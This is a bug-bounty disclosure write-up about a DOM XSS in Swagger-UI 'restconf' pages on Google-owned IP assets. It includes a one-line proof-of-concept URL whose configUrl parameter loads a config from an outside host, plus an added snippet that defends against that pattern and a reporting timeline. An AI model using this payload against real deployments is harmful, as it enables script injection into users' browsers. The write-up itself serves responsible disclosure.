[Google] YouTube "restconf" Swagger-UI XSS

During my recon, I came across a few Google owned IP assets which were running "restconfig" services hosted on Swagger-UI.

Dawid Moczadło has written a detailed article here.

POC -

Three IP assets on - "https://IP/ui" were vulnerable to DOM XSS on this endpoint -

"/ui/model.html?configUrl=http://hackingmonks/test.json".

The Swagger-UI did show the available API endpoints for the service, but it had authorisation in place (an access_token was needed).
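The weak point above is that model.html trusts a `configUrl` supplied in the query string, so a link can make the page load a config document from a host the operator does not control. As an added example (not from the original post and not Swagger-UI's own code), this is the kind of same-origin guard a deployment can put in front of Swagger-UI initialisation; `allowedConfigUrl`, `buildSwaggerOptions` and the origin/host values are assumptions for illustration, while `queryConfigEnabled` is a real Swagger-UI option that stops the library reading config from the query string itself.

```javascript
// Added example: reject any configUrl override that does not resolve to the
// page's own origin, so a crafted link cannot point Swagger-UI at a foreign
// config document. Returns the vetted absolute URL, or null to fall back to
// the build-time default.
function allowedConfigUrl(search, pageOrigin) {
  const params = new URLSearchParams(search);
  const raw = params.get("configUrl");
  if (raw === null) return null;            // no override requested

  let url;
  try {
    url = new URL(raw, pageOrigin);         // relative paths resolve against our origin
  } catch {
    return null;                            // unparseable: do not pass it through
  }

  // javascript:, data: and cross-host http(s) URLs all fail this check,
  // because their origin is "null" or another host.
  if (url.origin !== new URL(pageOrigin).origin) return null;
  if (!url.pathname.endsWith(".json")) return null;   // only config documents
  return url.href;
}

// Hypothetical wiring: compute the options object before SwaggerUIBundle is
// called, and turn off Swagger-UI's own query-string config parsing so the
// guard above is the only path by which configUrl can be set.
function buildSwaggerOptions(locationSearch, pageOrigin, defaultConfigUrl) {
  const vetted = allowedConfigUrl(locationSearch, pageOrigin);
  return {
    configUrl: vetted !== null ? vetted : defaultConfigUrl,
    queryConfigEnabled: false,
  };
}
```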

During this period, I had found a 4th asset which had the same vulnerability along with additional exploitation, which was reported in another ticket. The write-up can be found here (Access to BGP server + DOM XSS).

Timeline -

Reported - 22.05.2023

Triaged - 22.05.2023

The assets were no longer accessible to the public - 09.06.2023

Accepted - 07.06.2023

Rewarded - 13.06.2023

Google's date for the fix - 08.12.2023